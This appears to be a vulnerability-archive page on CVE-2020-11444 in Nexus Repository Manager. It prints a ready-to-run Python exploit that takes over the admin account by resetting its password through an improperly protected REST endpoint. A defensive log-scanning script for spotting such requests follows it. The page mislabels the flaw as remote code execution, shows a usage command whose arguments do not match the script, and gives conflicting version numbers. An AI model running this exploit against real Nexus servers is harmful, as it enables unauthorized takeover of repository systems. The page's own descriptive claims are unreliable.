    (CVE-2020-11444)Nexus Repository Manager 远程代码执行漏洞.md
    2.64 KB / 2021-07-15 19:57:50
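    (CVE-2020-11444) Nexus Repository Manager Remote Code Execution Vulnerability
    =============================================================================
    
    I. Vulnerability Overview
    -------------------------
    
    This vulnerability stems from improper access control. An attacker can exploit it with a specially crafted request to bypass access restrictions.
    
    II. Affected Versions
    ---------------------
    
    Nexus Repository Manager versions 3.x through 3.21.2
    
    III. Reproduction Steps
    -----------------------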
    
        cve-2020-11444_exp.py
        python3 cve-2020-11444_exp.py http://www.0-sec.org:8081 "sessionID" "touch /tmp/233"
        #!/usr/bin/python3
        # -*- coding:utf-8 -*-
        # author:zhzyker
        # from:https://github.com/zhzyker/exphub
    
        import sys
        import requests
    
        if len(sys.argv)!=4:
            print('+-----------------------------------------------------------------------------------------------+')
            print('+ DES: by zhzyker as https://github.com/zhzyker/exphub                                          +')
            print('+      CVE-2020-11444 Nexus 3 Unauthorized Vuln (change admin password)                         +')
            print('+-----------------------------------------------------------------------------------------------+')
            print('+ USE: python3 <filename> <url> <session> <password>                                            +')
            print('+ EXP: python3 cve-2020-11444_exp.py http://ip:8081 6c012a5e-88d9-4f96-a05f-3790294dc49a 123456 +')
            print('+ VER: Nexus Repository Manager 3.x OSS / Pro <= 3.21.1                                         +')
            print('+-----------------------------------------------------------------------------------------------+')
            sys.exit(0)
    
        url = sys.argv[1]
        vuln_url = url + "/service/rest/beta/security/users/admin/change-password"
        session = sys.argv[2]
        password = sys.argv[3]
    
        headers = {
            'accept': "application/json",
            'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36",
            'NX-ANTI-CSRF-TOKEN': "0.6080434247960143",
            'Content-Type': "text/plain",
            'Origin': "http://127.0.0.1:8081",
            'Cookie': "NX-ANTI-CSRF-TOKEN=0.6080434247960143; NXSESSIONID="+session+""
        }
        data = """%s""" % password
    
        r = requests.request('PUT', url=vuln_url, headers=headers, data=data)
        if r.status_code == 204:
            print ("[+] Password Change Success")
            print ("[+] " + url)
            print ("[+] Username:admin Password:"+password+"")
        else:
            print ("[-] SessionID Not available")
            print ("[-] Target Not CVE-2020-11444 Vuln Good Luck")
            sys.exit(0)
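
A defender-side check for the request shown above, as an added example (not part of the original page or the exphub project): it scans Nexus `request.log` lines for successful `PUT` calls to the change-password endpoint where the authenticated user is not the account being changed. The NCSA-style log layout, the sample lines, the `admin_accounts` allowlist and the function name are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Assumed NCSA-style request.log layout: host ident user [date] "request" status ...
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# Endpoint from the script on this page, with the user id segment captured.
ENDPOINT_RE = re.compile(
    r'^/service/rest/beta/security/users/(?P<target>[^/?]+)/change-password/?(?:\?.*)?$'
)

# Constructed sample lines (documentation IP ranges, made-up accounts).
SAMPLE_LOG = [
    '198.51.100.7 - dev01 [15/Jul/2021:19:40:02 +0000] "PUT /service/rest/beta/security/users/admin/change-password HTTP/1.1" 204 6 0 31',
    '192.0.2.10 - admin [15/Jul/2021:19:41:10 +0000] "PUT /service/rest/beta/security/users/admin/change-password HTTP/1.1" 204 9 0 28',
    '192.0.2.10 - admin [15/Jul/2021:19:42:55 +0000] "PUT /service/rest/beta/security/users/dev01/change-password HTTP/1.1" 204 9 0 30',
    '198.51.100.7 - dev01 [15/Jul/2021:19:44:13 +0000] "PUT /service/rest/beta/security/users/admin/change-password HTTP/1.1" 403 6 0 12',
    '192.0.2.33 - - [15/Jul/2021:19:45:00 +0000] "GET /service/rest/v1/status HTTP/1.1" 200 - 0 3',
]

def find_suspicious_password_changes(lines, admin_accounts=frozenset()):
    """Return successful change-password calls where the authenticated user is
    neither the target account nor in the caller-supplied admin allowlist."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "PUT" or m["status"] != "204":
            continue  # only successful PUTs matter; 403 is the access check working
        e = ENDPOINT_RE.match(m["path"])
        if not e:
            continue
        actor, target = m["user"], unquote(e["target"])
        if actor != target and actor not in admin_accounts:
            findings.append({"ts": m["ts"], "host": m["host"],
                             "actor": actor, "target": target})
    return findings

if __name__ == "__main__":
    for f in find_suspicious_password_changes(SAMPLE_LOG, admin_accounts={"admin"}):
        print("[!] {ts} {host}: '{actor}' changed password of '{target}'".format(**f))
```

Hits still need triage against the real list of administrators, since an administrator resetting another user's password produces the same request.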
    
    References
    ----------
    
    > https://github.com/zhzyker/exphub/blob/master/nexus/cve-2020-11444_exp.py
    
    